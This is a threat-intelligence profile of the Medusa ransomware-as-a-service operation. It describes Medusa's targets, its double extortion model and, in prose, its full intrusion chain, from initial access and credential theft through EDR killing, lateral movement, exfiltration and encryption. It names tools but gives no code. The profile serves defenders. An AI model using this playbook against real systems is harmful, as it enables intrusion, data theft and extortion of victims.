Medusa Ransomware - RaaS Double Extortion Against Critical Sectors

Medusa is a ransomware-as-a-service operation tracked since June 2021 and designated Storm-1175 by Microsoft, distinct from the unrelated MedusaLocker family and the Medusa Android banking trojan. A March 2025 joint advisory from CISA, the FBI, and MS-ISAC documented more than 300 victims, and reporting through 2026 describes continued high-tempo affiliate activity. The operation is notable for a broad sector footprint spanning healthcare, education, legal, insurance, technology, and manufacturing, a mature double extortion model in which stolen data is published on a Tor leak site with a countdown timer, and at least one documented case of triple extortion where a second actor re-extorted a victim after a negotiated payment.

Initial access is brokered or earned: affiliates buy footholds from initial access brokers, run credential phishing, and exploit internet-facing software including ConnectWise ScreenConnect and Fortinet EMS. Once inside, operators harvest credentials from LSASS memory using Mimikatz-class tooling and reuse them through pass-the-hash and pass-the-ticket, then enumerate the domain with built-in utilities and network scanners to locate domain controllers, shares, and high-value hosts. Persistence and privilege are established by creating domain accounts and promoting them into Domain Admins and Enterprise Admins, while RMM platforms such as AnyDesk, Atera, ConnectWise, and Splashtop are silently installed to give the operators durable, blend-in remote control.

Before encryption the operators invest heavily in defense evasion and staging. A signed vulnerable kernel driver, ABYSSWORKER, is loaded to terminate endpoint protection at ring zero, PowerShell command history is wiped, and payloads are obscured with base64 and string-concatenation tricks. Lateral movement runs over RDP, which is force-enabled through registry and firewall changes, as well as PsExec and WMI based remote execution and software deployment tooling for fan-out. Operators tunnel traffic with Ligolo and Cloudflared and open TLS reverse shells over port 443, then exfiltrate to attacker infrastructure with Rclone. Impact is delivered by deleting volume shadow copies and backup files, stopping backup, security, and database services, shutting down virtual machines, and encrypting file contents with AES-256, dropping a ransom note in each affected directory.